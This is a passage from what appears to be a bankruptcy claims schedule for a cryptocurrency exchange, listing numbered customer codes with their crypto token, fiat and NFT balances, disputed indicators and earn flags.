| 07326891 | | BAT[2.12732272], BRZ[5.07659132], CUSDT[8], ETHW[1.11258102], GRT[2.08233983], SUSHI[1.07423993], TRX[3], UNI[2.18254243], USD[0.00], USDT[0] | Yes | |
| 07326892 | | USD[10.00] | | |
| 07326893 | | USD[10.00] | | |
| 07326894 | | USD[10.00] | | |
| 07326896 | | CUSDT[1], USD[0.49] | | |
| 07326897 | | USD[10.00] | | |
| 07326899 | | USD[10.00] | | |
| 07326900 | | USD[10.00] | | |
| 07326901 | | CUSDT[2], SUSHI[1.42227683], USD[0.00] | | |
| 07326903 | | BTC[0], CUSDT[16], DOGE[0], LTC[0], USD[0.00] | | |
| 07326904 | | USD[10.00] | | |
| 07326905 | | USD[0.00] | | |
| 07326906 | | USD[10.00] | | |
| 07326907 | | USD[10.00] | | |
| 07326908 | | CUSDT[3], NFT (33445604088573195/Saudi Arabia Ticket Stub #104)[1], SOL[0.31643231], USD[0.00] | Yes | |
| 07326909 | | USD[20.00] | | |
| 07326910 | | BAT[2], CUSDT[3], TRX[2], USD[0.01] | | |
| 07326911 | | CUSDT[1], USD[0.00], USDT[0] | Yes | |
| 07326912 | | USD[10.00] | | |
| 07326913 | | BAT[3.21327984], BRZ[10.85454856], CUSDT[3], DOGE[12.42244905], ETHW[.36044063], GRT[3.14759159], SHIB[10], TRX[22.44029798], USD[481.20] | Yes | |
| 07326914 | | DOGE[1], ETH[.00734586], ETHW[0.00734586], USD[0.00] | | |
| 07326915 | | USD[10.00] | | |
| 07326916 | | BRZ[2], BTC[.00422718], CUSDT[1], ETH[.00002229], ETHW[.00002229], TRX[1], USD[0.00] | Yes | |
| 07326917 | | BAT[135.8708], SUSHI[0], USD[0.15] | | |
| 07326918 | | DOGE[21.44567435], USD[0.01] | | |
| 07326919 | | USD[0.00] | | |
| 07326921 | | CUSDT[1], DOGE[1.95879189], TRX[1], USD[0.06] | | |
| 07326922 | | USD[10.00] | | |
| 07326923 | | USD[10.00] | | |
| 07326924 | | USD[10.00] | | |
| 07326925 | | USD[10.00] | | |
| 07326926 | | DOGE[219620.30217226], GRT[2.04238368], TRX[1], USD[0.00], USDT[1.07693721] | Yes | |
| 07326927 | | USD[10.00] | | |
| 07326928 | | BTC[.00000104], USD[10.00] | | |
| 07326930 | Contingent, Disputed | BCH[0], BTC[0], DOGE[0], SHIB[1247.10639204], USD[0.00] | Yes | |
| 07326931 | | AVAX[.04051436], BCH[.01554553], BTC[.00018728], CUSDT[1041.5935416], DOGE[1211.51281176], ETH[.00835897], ETHW[.00824945], GRT[4.08858006], LTC[.07694668], TRX[23.661155], USD[0.01] | Yes | |
| 07326932 | | BRZ[0.00000028], BTC[0], DOGE[71.93924241], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07326933 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07326934 | | USD[10.00] | | |
| 07326935 | | BTC[.00024699], ETH[.01756504], ETHW[0.01734600], SHIB[5567372.31509785], USD[0.00] | Yes | |
| 07326938 | | CUSDT[3], DOGE[.00003525], LINK[1.69834346], USD[0.08] | | |
| 07326939 | | USD[10.00] | | |
| 07326940 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326941 | | CUSDT[3], TRX[104.51540844], USD[0.00] | | |
| 07326942 | | USD[10.00] | | |
| 07326943 | | DOGE[20.21112092], USD[0.00] | | |
| 07326945 | | USD[10.00] | | |
| 07326946 | | USD[10.00] | | |
| 07326947 | | USD[10.00] | | |
| 07326948 | | DOGE[1760.98606946], GRT[50.22973922], USD[0.00] | Yes | |
| 07326949 | | USD[10.00] | | |
| 07326950 | | USD[10.00] | | |
| 07326951 | | BTC[.00067385], CUSDT[3], DOGE[217.96240933], ETH[.00504323], ETHW[.00497483], SHIB[229868.3460912], USD[0.00] | Yes | |
| 07326952 | | USD[10.00] | | |
| 07326953 | | BRZ[7.67724517], BTC[.00022098], CUSDT[11.00976964], DOGE[749.25706848], ETH[0.51459106], ETHW[0.51437486], SHIB[7945.75078643], SOL[9.21114463], SUSHI[.00002702], TRX[98.96904888], USD[0.03], USDT[0.00000001] | Yes | |
| 07326955 | | USD[10.00] | | |
| 07326956 | | BRZ[4], BTC[.01699757], CUSDT[14], DOGE[490.77239853], ETH[.02135814], ETHW[.02109794], GRT[.96789451], LINK[2.97075013], SHIB[1], SOL[24.93357072], TRX[6], USD[0.01] | Yes | |
| 07326957 | | BRZ[0], CUSDT[2], DOGE[0], ETH[0], ETHW[0], GRT[0], TRX[1], USD[0.00], USDT[0.00018174] | Yes | |
| 07326958 | | BRZ[1], USD[0.00] | | |
| 07326959 | | USD[10.00] | | |
| 07326960 | | SHIB[1], USD[0.00] | | |
| 07326961 | | TRX[1], USD[0.00] | | |
| 07326962 | | BRZ[0], BTC[0.00099370], CUSDT[2], DOGE[0], ETH[0.03129570], ETHW[0.03090934], SUSHI[0], USD[0.00] | Yes | |
| 07326963 | | USD[10.00] | | |
| 07326964 | | ALGO[0], BTC[.00493043], CUSDT[21], DOGE[2], ETH[.09802535], ETHW[.09700249], SHIB[12], SOL[.02259075], TRX[2], USD[0.00] | Yes | |
| 07326965 | | USD[10.00] | | |
| 07326966 | | USD[10.00] | | |
| 07326967 | | USD[10.00] | | |
| 07326969 | | USD[10.00] | | |
| 07326970 | | USD[10.00] | | |
| 07326971 | | DOGE[.3470404], USD[6.85] | | |
| 07326973 | | DOGE[1], USD[10.79] | | |
| 07326974 | | BRZ[1], USD[0.01], USDT[0] | | |
| 07326975 | | SOL[.00431], USD[0.59] | | |
| 07326976 | | USD[0.00] | | |
| 07326977 | | USD[10.00] | | |
| 07326978 | | USD[10.00] | | |
| 07326980 | | BTC[0], DOGE[0], TRX[1], USD[0.00] | | |
| 07326981 | | CUSDT[1.00065846], DOGE[0.00597057], ETH[0], ETHW[0], SOL[0.04579722], USD[0.01] | | |
| 07326982 | | USD[10.00] | | |
| 07326983 | | USD[10.00] | | |
| 07326984 | | USD[10.00] | | |
| 07326985 | | BAT[8697.96692885], BRZ[10.70779984], BTC[0], CAD[0.69], CUSDT[6], DOGE[5.59050205], SOL[80.83235544], TRX[3], USD[0.00], USDT[1] | | |
| 07326986 | | USD[10.00] | | |
| 07326987 | | USD[10.00] | | |
| 07326988 | | USD[10.00] | | |
| 07326989 | | BTC[0.00000901], CUSDT[0], DOGE[1], ETH[0.09826640], ETHW[0.09724175], LINK[0], LTC[0], MATIC[0], SHIB[1057652.76350621], SOL[0], USD[0.00] | Yes | |
| 07326992 | | BTC[0], ETH[0], USD[0.00] | | |
| 07326993 | | USD[20.00] | | |
| 07326996 | | USD[10.00] | | |
| 07326997 | | CUSDT[3], DOGE[2600.64231246], USD[0.00] | | |
| 07326998 | | DOGE[179.97344354], ETH[.03794448], ETHW[.03794448], NFT (326534163125518224/Cyberpunk PDX AI)[1], NFT (385449666580773135/Cyberpunk PDX AI #2)[1], SHIB[1], USD[0.00] | | |
| 07326999 | | CUSDT[1], USD[0.01] | Yes | |
| 07327000 | | USD[10.00] | | |
| 07327001 | | BAT[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], SOL[0], TRX[0], USD[0.10] | | |
| 07327002 | | USD[10.00] | | |
| 07327003 | | BRZ[1.00000053], BTC[0], CUSDT[6], DOGE[0], SUSHI[0], TRX[4], USD[0.01], USDT[1] | | |
| 07327004 | | BTC[0], DOGE[0] | | |
| 07327005 | | USD[10.00] | | |
| 07327006 | | ETHW[.062974], LINK[0], SHIB[1768.48745073], TRX[1], USD[86.81] | Yes | |
| 07327007 | | BAT[0], DOGE[0], ETH[0], ETHW[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07327008 | | DOGE[405.91444663], USD[20.00] | | |
| 07327009 | | DOGE[133.02965324], USD[0.00] | | |
| 07327010 | | BTC[.00057258], DOGE[614.99462791], USD[10.00] | | |
| 07327011 | | USD[10.00] | | |
| 07327013 | | USD[10.00] | | |
| 07327014 | | CUSDT[1], USD[0.01] | | |
| 07327015 | | BRZ[1], CUSDT[3], USD[8.16] | | |
| 07327016 | | CUSDT[1], DOGE[.09551992], USD[0.93] | | |
| 07327017 | | BTC[0], DAI[0], ETH[0], LINK[0], USD[0.00], USDT[0] | | |
| 07327018 | | BTC[0], DOGE[0] | | |
| 07327019 | | USD[10.00] | | |
| 07327020 | | DOGE[4.91674551], USD[0.43], USDT[0] | | |
| 07327022 | | BTC[0], CUSDT[2], TRX[1], USD[0.00] | | |
| 07327023 | | USD[10.00] | | |
| 07327026 | | BRZ[1], BTC[.0004706], CUSDT[2], TRX[1], USD[0.00] | Yes | |
| 07327028 | | CUSDT[2], DAI[0], DOGE[21.93629304], USD[0.00], YFI[0] | | |
| 07327029 | | DOGE[901.91802095], USD[74.38] | | |
| 07327030 | | CUSDT[1], DOGE[1], ETH[.0670224], ETHW[.0670224], TRX[1], USD[0.00] | | |
| 07327033 | | USD[10.00] | | |
| 07327034 | | USD[10.00] | | |
| 07327036 | | AVAX[4.18405804], BAT[16.72635085], CUSDT[5], DOGE[1441.29710882], ETH[0.22206222], ETHW[0.22206222], MATIC[204.99746568], SHIB[1], SOL[6.41623003], TRX[1], USD[0.00], USDT[0.00000001] | | |
| 07327037 | | USD[10.00] | | |
| 07327038 | | USD[10.00] | | |
| 07327040 | | USD[10.00] | | |
| 07327041 | | DOGE[0], ETH[0], ETHW[0], USD[0.01], YFI[0] | | |
| 07327042 | | CUSDT[1], USD[10.11] | | |
| 07327043 | | USD[0.00] | | |
| 07327044 | | USD[20.00] | | |
| 07327045 | | SOL[.07484892], USD[0.08] | Yes | |
| 07327046 | | USD[10.00] | | |
| 07327047 | | BRZ[0], BTC[0], DOGE[0], ETH[0], LINK[0], USD[0.10] | | |
| 07327048 | | USD[10.00] | | |
| 07327049 | | USD[10.00] | | |
| 07327050 | | USD[10.00] | | |
| 07327051 | | BAT[1], DOGE[1], USD[0.01] | | |
| 07327052 | | BRZ[3], CUSDT[16], NFT (475378211985736491/Monkey )[1], NFT (538210933392612738/The most handsome)[1], TRX[4], USD[18.37] | Yes | |
| 07327053 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07327054 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07327055 | | CUSDT[2], DOGE[590.30101423], TRX[14.17706832], USD[0.09] | | |
| 07327058 | | BRZ[1], BTC[0], CUSDT[4], DOGE[1], TRX[1], USD[0.01] | | |
| 07327059 | | BCH[.01447072], CUSDT[1], DOGE[2379.96451432], USD[0.00] | | |
| 07327060 | | USD[10.00] | | |
| 07327061 | | BTC[.00016374], CUSDT[5], DOGE[2522.90445481], ETH[.00620577], ETHW[.00612369], USD[0.00] | Yes | |
| 07327062 | | USD[10.00] | | |
| 07327063 | | USD[10.00] | | |
| 07327065 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07327066 | | BRZ[2], CUSDT[14], DOGE[242.11186503], SHIB[1], TRX[5], USD[0.00] | Yes | |
| 07327067 | | USD[10.00] | | |
| 07327069 | | BTC[.00021184], CUSDT[2], DOGE[6], TRX[1], USD[0.00] | | |
| 07327070 | | USD[10.00] | | |
| 07327071 | | BRZ[2], CUSDT[1], TRX[1], USD[0.00] | | |
| 07327074 | | USD[10.00] | | |
| 07327076 | | BRZ[0], DOGE[3], USD[0.00] | | |
| 07327077 | | CUSDT[1], DOGE[1921.50205333], USD[0.63] | | |
| 07327078 | | CUSDT[5], DOGE[1], TRX[2], USD[0.00] | | |
| 07327079 | | BRZ[1], USD[0.01] | | |
| 07327080 | | USD[10.00] | | |
| 07327082 | Contingent, Disputed | DOGE[12.24942159], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07327083 | | DOGE[0], ETH[0] | | |
| 07327084 | | USD[10.00] | | |
| 07327085 | | CUSDT[1], DOGE[1420.09244683], TRX[1], USD[0.00] | Yes | |
| 07327087 | | BAT[2.09862967], BF_POINT[100], CUSDT[1], DOGE[3], GRT[1102.29113024], SHIB[1], TRX[2], USD[0.01] | Yes | |
| 07327089 | | CUSDT[1], SOL[.00001089], USD[0.07] | Yes | |
| 07327090 | | USD[10.00] | | |
| 07327092 | | USD[10.00] | | |
| 07327093 | | USD[10.00] | | |
| 07327095 | | USD[0.00] | | |
| 07327097 | | USD[10.00] | | |
| 07327098 | | USD[10.00] | | |
| 07327100 | | USD[10.00] | | |
| 07327101 | | BTC[0], ETH[0.00000961], ETHW[0.00000961], KSHIB[0], USD[0.01], USDT[0.00000001] | Yes | |
| 07327102 | | BRZ[0], BTC[0], DOGE[0], GRT[0], LINK[0], TRX[0], USD[0.00] | | |
| 07327103 | | USD[10.00] | | |
| 07327104 | | CUSDT[1], DOGE[1380.22499227], USD[0.00] | Yes | |
| 07327105 | | BRZ[1], DOGE[254.17376502], USD[0.00] | Yes | |
| 07327106 | | USD[10.00] | | |
| 07327107 | | USD[10.00] | | |
| 07327109 | | USD[10.00] | | |
| 07327111 | | DOGE[184.27332878], USD[0.00] | | |
| 07327112 | | BTC[0], USD[0.00], USDT[0] | Yes | |
| 07327113 | | CUSDT[2], DOGE[.00000989], TRX[1], USD[0.01] | | |
| 07327114 | | USD[10.00] | | |
| 07327115 | | DOGE[1], USD[0.00] | | |
| 07327116 | | USD[10.00] | | |
| 07327117 | | USD[10.00] | | |
| 07327118 | | USD[10.00] | | |
| 07327119 | | DOGE[1.10694371], TRX[1], USD[0.72] | | |
| 07327120 | | CUSDT[2], DOGE[2882.09356731], USD[0.00] | | |
| 07327121 | | CUSDT[1], DOGE[424.75722626], ETH[.02396893], ETHW[.02391811], TRX[3], USD[0.00] | Yes | |
| 07327122 | | USD[10.00] | | |
| 07327124 | | BAT[0], BCH[0.00653025], BRZ[4], CUSDT[5], DOGE[4.00002434], ETH[.0068301], ETHW[.0068301], LINK[.00600091], LTC[.04751948], SUSHI[.00847125], TRX[1.78203247], USD[0.00], USDT[2] | | |
| 07327125 | | GRT[9.3530547], USD[0.00] | Yes | |
| 07327127 | | USD[10.00] | | |
| 07327129 | | BRZ[1], CUSDT[3], USD[0.05] | | |
| 07327130 | | BAT[1], BRZ[3], CUSDT[3], DOGE[.00002368], GRT[1], LTC[.00008838], TRX[6], UNI[1], USD[0.17] | | |
| 07327133 | | USD[0.01], USDT[0] | | |
| 07327134 | | USD[10.00] | | |
| 07327135 | | USD[10.00] | | |
| 07327136 | | USD[10.52] | Yes | |
| 07327137 | | USD[10.00] | | |
| 07327138 | | DOGE[26.71429292], USD[0.00] | | |
| 07327139 | | USD[10.00] | | |
| 07327140 | | USD[10.00] | | |
| 07327141 | | USD[10.00] | | |
| 07327142 | | BAT[1], BRZ[1], DOGE[5], GRT[1], LINK[0], TRX[2], USD[0.86], USDT[2] | | |
| 07327143 | | USD[10.00] | | |
| 07327145 | | USD[10.00] | | |
| 07327146 | | CUSDT[3], DOGE[53.42353719], USD[0.00] | | |
| 07327147 | | BTC[0], USD[0.00], USDT[0] | Yes | |
| 07327148 | | ETH[0], USD[0.00] | | |
| 07327149 | Contingent, Disputed | CUSDT[4], DOGE[133.84306045], TRX[2], USD[6.17], USDT[0] | | |
| 07327153 | | USD[10.00] | | |
| 07327154 | | USD[0.00] | | |
| 07327155 | | DOGE[707.48785459], USD[0.00] | | |
| 07327156 | | USD[10.00] | | |
| 07327157 | | BTC[0], CUSDT[1], DOGE[1.00002], USD[0.00], USDT[0.00034469] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07327158 | | BAT[1], BRZ[3], CUSDT[7], DOGE[40.84526733], ETH[.07743059], ETHW[.07647111], GRT[1], SHIB[2], TRX[6], USD[0.00], USDT[0] | Yes | |
| 07327160 | | USD[10.04] | Yes | |
| 07327162 | | DOGE[1], USD[0.01] | | |
| 07327163 | | USD[0.74] | | |
| 07327164 | | USD[10.00] | | |
| 07327165 | | USD[10.00] | | |
| 07327166 | | CUSDT[1], DOGE[1192.83037293], USD[0.00] | | |
| 07327168 | | USD[10.00] | | |
| 07327170 | | CUSDT[1], DOGE[3], TRX[1], USD[0.01] | | |
| 07327171 | | USD[10.00] | | |
| 07327172 | | BAT[0], BRZ[2], CUSDT[7], DAI[0], DOGE[134.38035628], ETH[0.02795776], ETHW[0.02761441], GRT[3.43833923], LINK[0.08910260], LTC[0.29553668], SOL[0], SUSHI[0], TRX[5], UNI[0], USD[0.00] | Yes | |
| 07327173 | | USD[10.00] | | |
| 07327174 | | SOL[.00001173], TRX[2], USD[0.01] | | |
| 07327175 | | USD[10.00] | | |
| 07327177 | | USD[10.00] | | |
| 07327178 | | USD[0.47] | | |
| 07327179 | | CUSDT[4], DOGE[3], ETH[0], TRX[3], USD[0.00], USDT[1.07782962] | Yes | |
| 07327180 | | USD[10.00] | | |
| 07327181 | | USD[10.00] | | |
| 07327182 | | USD[0.00] | | |
| 07327183 | | BAT[24.4995708], BTC[.00019574], CUSDT[703.68022828], DOGE[4612.09764207], LINK[3.00084992], SOL[1.02554491], SUSHI[7.70980825], TRX[1369.4159], UNI[1.30136606], USD[0.00] | | |
| 07327184 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07327185 | | USD[10.00] | | |
| 07327186 | | USD[10.00] | | |
| 07327187 | | CUSDT[2], USD[20.87] | | |
| 07327188 | | USD[10.00] | | |
| 07327189 | | USD[0.00] | | |
| 07327190 | | USD[10.00] | | |
| 07327191 | | DOGE[30.23131703], USD[0.00] | | |
| 07327192 | | BRZ[1], CUSDT[1], TRX[5], USD[0.41] | Yes | |
| 07327194 | | USD[10.00] | | |
| 07327195 | Contingent, Disputed | DOGE[0], USD[0.00], USDT[0] | | |
| 07327196 | | USD[10.00] | | |
| 07327198 | | USD[10.00] | | |
| 07327199 | | DOGE[.48], USDT[0.00030604] | | |
| 07327200 | | BTC[.00475343], CUSDT[5], DOGE[18739.70332606], TRX[1], USD[0.01], USDT[1] | | |
| 07327201 | | USD[10.00] | | |
| 07327202 | | BRZ[0], CUSDT[2], DOGE[.22967773], TRX[1], USD[0.01] | | |
| 07327203 | | CUSDT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07327204 | | CUSDT[1], DOGE[2976.17755289], GRT[1], TRX[598.58759057], USD[0.00], USDT[0.00048854] | | |
| 07327205 | | BTC[0.00069142], DOGE[0], ETH[0], ETHW[0] | | |
| 07327206 | | USD[10.00] | | |
| 07327207 | | USD[10.00] | | |
| 07327208 | | CUSDT[2], DOGE[3619.35937582], ETH[.02331645], ETHW[.02331645], USD[0.01] | | |
| 07327209 | | USD[10.00] | | |
| 07327210 | | BRZ[2], CUSDT[11.74536218], DOGE[2244.07590129], TRX[1000.73524552], USD[0.85] | | |
| 07327211 | | CUSDT[1], ETH[.08994655], ETHW[.08994655], TRX[52.84987675], USD[0.14] | | |
| 07327212 | | USD[10.00] | | |
| 07327213 | | BRZ[1], CUSDT[2], DOGE[10.40038955], ETH[1.72981879], ETHW[1.72909229], GRT[1.00035964], LINK[160.83260854], SHIB[77539256.47795025], SOL[.00028348], TRX[2.44329493], USD[0.00], USDT[2.16060208] | Yes | |
| 07327214 | | DOGE[155.413357], USD[10.96] | Yes | |
| 07327215 | | BRZ[3], BTC[0], CUSDT[3], DOGE[2], LTC[0], TRX[1], USD[0.00] | | |
| 07327216 | | USD[10.00] | | |
| 07327219 | | DOGE[0], GRT[0], LINK[0], USD[0.00], USDT[0.00000001] | | |
| 07327220 | | USD[10.00] | | |
| 07327221 | | DOGE[1], TRX[604.186425], USD[0.00] | | |
| 07327222 | | USD[10.00] | | |
| 07327224 | | DOGE[1246.58839282], USD[10.00] | | |
| 07327226 | | ETH[.0037834], ETHW[.0037834], USD[0.00], USDT[.00002362] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07327228 | | AAVE[0], BAT[0], BCH[0], BRZ[1], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], ETHW[0], GRT[0], KSHIB[0], LINK[0], LTC[0], NFT (48788169782175903/Entrance Voucher #2637][1], PAXG[0], SHIB[21], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000001], YFI[0] | Yes | |
| 07327229 | | USD[10.00] | | |
| 07327230 | | BTC[.00028956], CUSDT[469.50362668], TRX[208.40923875], USD[291.39] | | |
| 07327232 | | USD[10.00] | | |
| 07327233 | | BRZ[1], USD[0.00] | | |
| 07327234 | | USD[10.00] | | |
| 07327236 | | USD[10.00] | | |
| 07327237 | | BTC[0], USD[0.00] | | |
| 07327238 | | USD[10.00] | | |
| 07327239 | | SOL[5.15922655], USD[0.00] | | |
| 07327240 | | USD[10.00] | | |
| 07327242 | | USD[10.00] | | |
| 07327243 | | BTC[.00066621], CUSDT[3], DOGE[1312.32697296], LTC[.29670591], TRX[2], USD[2.27] | Yes | |
| 07327244 | | USD[10.00] | | |
| 07327245 | | USD[10.00] | | |
| 07327246 | | USD[10.00] | | |
| 07327247 | | AVAX[.21544128], MATIC[5.55262456], NFT (44758163402239767/FTX - Off The Grid Miami #3020][1], USD[0.50] | Yes | |
| 07327248 | | USD[10.00] | | |
| 07327249 | | USD[62.71] | Yes | |
| 07327250 | | CUSDT[1], DOGE[.30262137], USD[0.00] | | |
| 07327251 | | USD[10.00] | | |
| 07327252 | | USD[10.00] | | |
| 07327253 | | CUSDT[3], GRT[1], SHIB[688606.24695113], USD[0.01], USDT[0] | Yes | |
| 07327254 | | USD[10.00] | | |
| 07327255 | | USD[10.00] | | |
| 07327256 | | USD[10.00] | | |
| 07327258 | | BAT[7.3417119], BRZ[7.3417119], CUSDT[30], DOGE[2], ETH[.11685977], ETHW[.11572755], GRT[7.10089331], SHIB[1], SOL[.0007819], USD[0.00], USDT[0] | Yes | |
| 07327259 | | AVAX[.00584], BTC[.01060389], DOGE[.8006], ETH[.0003472], ETHW[.0003472], GRT[.06425], SOL[.009604], SUSHI[.3418], TRX[.9905], USD[20004.68], USDT[.0019151] | | |
| 07327260 | | DOGE[1], USD[0.01] | | |
| 07327261 | | USD[10.00] | | |
| 07327262 | | DOGE[182.10456686], ETH[.02507902], ETHW[.02476438], USD[0.00] | Yes | |
| 07327264 | | DOGE[.00001221], USD[0.00] | | |
| 07327265 | | USD[10.00] | | |
| 07327266 | | BRZ[2], CUSDT[2], GRT[1.00404471], SHIB[1], TRX[2], USD[0.00] | Yes | |
| 07327267 | | USD[0.02] | | |
| 07327269 | | USD[10.00] | | |
| 07327271 | | USD[10.00] | | |
| 07327275 | | TRX[2], USD[0.00], USDT[0] | | |
| 07327277 | | BRZ[.2529524], CUSDT[11.95118669], DOGE[.35283507], SHIB[559123.61681345], USD[0.06] | | |
| 07327278 | | USD[0.98] | | |
| 07327280 | | DOGE[215.85420806], USD[4.77] | | |
| 07327281 | | USD[10.00] | | |
| 07327282 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07327283 | | BAT[1], CUSDT[2], DOGE[0], ETH[0], SHIB[1397624.03913347], SOL[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07327284 | | USD[0.00] | | |
| 07327285 | | CUSDT[1], DOGE[2119.26611024], USD[0.00] | | |
| 07327286 | | USD[10.00] | | |
| 07327288 | | USD[10.00] | | |
| 07327289 | | USD[10.00] | | |
| 07327290 | | DOGE[971.11451453], USD[0.00] | | |
| 07327291 | | TRX[1], USD[0.01] | | |
| 07327292 | | BTC[.00001244], DOGE[.01532751], ETH[.00030514], ETHW[.00030514], LTC[.006268], USD[1621.89] | | |
| 07327294 | | BAT[.924], BTC[.0000456], DOGE[.92], ETH[.000536], ETHW[.000536], GRT[.58], LTC[.00864], SOL[.0663], SUSHI[.474], TRX[.532] | | |
| 07327295 | | USD[10.86] | Yes | |
| 07327296 | | USD[10.00] | | |
| 07327297 | | BRZ[3], BTC[0], CUSDT[3], TRX[3], USD[10.02] | | |
| 07327299 | | CUSDT[8.62869999], DOGE[490.10107433], USD[0.00] | | |
| 07327301 | | CUSDT[1], DOGE[171.71800949], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07327302 | | BRZ[0], DOGE[1.00099206], ETH[0], USD[0.01] | | |
| 07327303 | | USD[10.63] | Yes | |
| 07327304 | | USD[0.01], USDT[0] | | |
| 07327308 | | DOGE[135.28799228], USD[0.00] | | |
| 07327310 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07327312 | | DOGE[27.28886814], USD[0.00] | | |
| 07327313 | | DOGE[2718.77730906], ETHW[.03114555], USD[3618.33] | | |
| 07327314 | | USD[10.00] | | |
| 07327316 | | USD[10.00] | | |
| 07327317 | | USD[10.00] | | |
| 07327318 | | CUSDT[1], TRX[3], USD[0.01] | | |
| 07327319 | | USD[60.00] | | |
| 07327320 | | USD[10.00] | | |
| 07327321 | | GBP[7.20], USD[0.00] | | |
| 07327322 | | USD[10.00] | | |
| 07327323 | | GRT[0], SUSHI[0], USD[10.00], USDT[0] | | |
| 07327324 | | USD[10.00] | | |
| 07327327 | | DOGE[2665.26143451], USD[0.05] | | |
| 07327328 | | USD[10.00] | | |
| 07327329 | | USD[10.00] | | |
| 07327330 | | USD[10.00] | | |
| 07327331 | | USD[10.00] | | |
| 07327332 | | USD[10.00] | | |
| 07327334 | | USD[10.00] | | |
| 07327335 | | USD[10.00] | | |
| 07327336 | | DOGE[.04749447], USD[0.00] | | |
| 07327338 | | CUSDT[5], USD[0.01] | | |
| 07327339 | Contingent, Disputed | CUSDT[2], DOGE[7], GRT[3], LTC[0], SOL[0], SUSHI[0], TRX[1], USD[0.01] | | |
| 07327340 | | CUSDT[1], DOGE[0], TRX[2], USD[0.01], USDT[1] | | |
| 07327341 | | USD[10.00] | | |
| 07327342 | | BAT[2.07164581], BRZ[6.41966846], BTC[0], CUSDT[4], DOGE[8.18356654], ETH[0], GRT[1], LINK[0], SHIB[0], TRX[7], USD[834.43], USDT[3.23596045] | Yes | |
| 07327343 | | SOL[33.81], USD[0.13] | | |
| 07327344 | | CUSDT[13], DOGE[865.02798231], KSHIB[1132.52130046], SHIB[1220953.00323652], TRX[2], USD[0.45] | Yes | |
| 07327345 | | BTC[0], USD[5.47] | | |
| 07327347 | | BRZ[0.00000003], DOGE[0], ETH[0], ETHW[0], GRT[6.9708073], USD[0.00], USDT[0.00000001] | | |
| 07327349 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[2.28784490], ETH[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[571.92] | | |
| 07327351 | | BRZ[8], CUSDT[11], ETH[0], PAXG[0], TRX[16], USD[0.00], USDT[1.00022704] | | |
| 07327352 | | DOGE[3542.916], USD[1.22] | | |
| 07327356 | | BCH[.28184738], BF_POINT[200], BRZ[58.98703452], BTC[.0169631], CUSDT[527.99297053], DOGE[1449.63368113], ETH[.14894223], ETHW[.14810105], LTC[1.84959752], SHIB[2], SUSHI[2.5116419], TRX[82.5282961], USD[12.41], YFI[.00110662] | Yes | |
| 07327357 | | BRZ[1], CUSDT[2], DOGE[33.8077176], USD[0.00], USDT[0] | | |
| 07327358 | | USD[0.00] | | |
| 07327359 | | CUSDT[1], DOGE[3302.31528805], USD[0.00] | Yes | |
| 07327360 | | CUSDT[1], USD[0.00] | | |
| 07327361 | | DOGE[0], USD[0.00] | | |
| 07327362 | | USD[10.00] | | |
| 07327363 | | DOGE[137.10317713], USD[0.00] | | |
| 07327364 | | USD[0.18] | | |
| 07327365 | | DOGE[.00016288], TRX[3], USD[36.22] | | |
| 07327368 | | TRX[0], USD[0.75] | | |
| 07327369 | | CUSDT[1], DOGE[11595.92030976], USD[0.00], USDT[2.21219865] | Yes | |
| 07327370 | | USD[7.19], USDT[0] | | |
| 07327372 | | BTC[0], ETH[0], LINK[0], LTC[0], MATIC[.0000067], NFT [520356008175476982/Entrance Voucher #1894][1], SHIB[33], SOL[0], USD[10127.66], USDT[0.00000001] | Yes | |
| 07327374 | | BTC[.00017888], CUSDT[1], DOGE[361.24209709], TRX[238.71719505], USD[0.00] | | |
| 07327375 | | USD[10.00] | | |
| 07327376 | | USD[0.00] | | |
| 07327378 | | CUSDT[1], DOGE[91.56054854], GRT[8.19282401], SUSHI[1.24791765], USD[0.00] | | |
| 07327379 | | CUSDT[2], DOGE[134.0492716], LTC[.27759045], USD[0.00] | | |
| 07327381 | | CUSDT[1], USD[1.35] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07327382 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07327384 | | USD[10.00] | | |
| 07327385 | | CUSDT[1], DOGE[439.19836753], USD[0.01] | | |
| 07327386 | | CUSDT[4], DOGE[1], ETH[.03446959], ETHW[.03446959], SHIB[4060089.32196508], USD[0.01] | | |
| 07327387 | | USD[10.00] | | |
| 07327388 | | BTC[.00017827], USD[0.00] | Yes | |
| 07327389 | | USD[10.00] | | |
| 07327390 | Contingent, Disputed | DOGE[90.58359933], USD[0.00], USDT[4.97153987] | | |
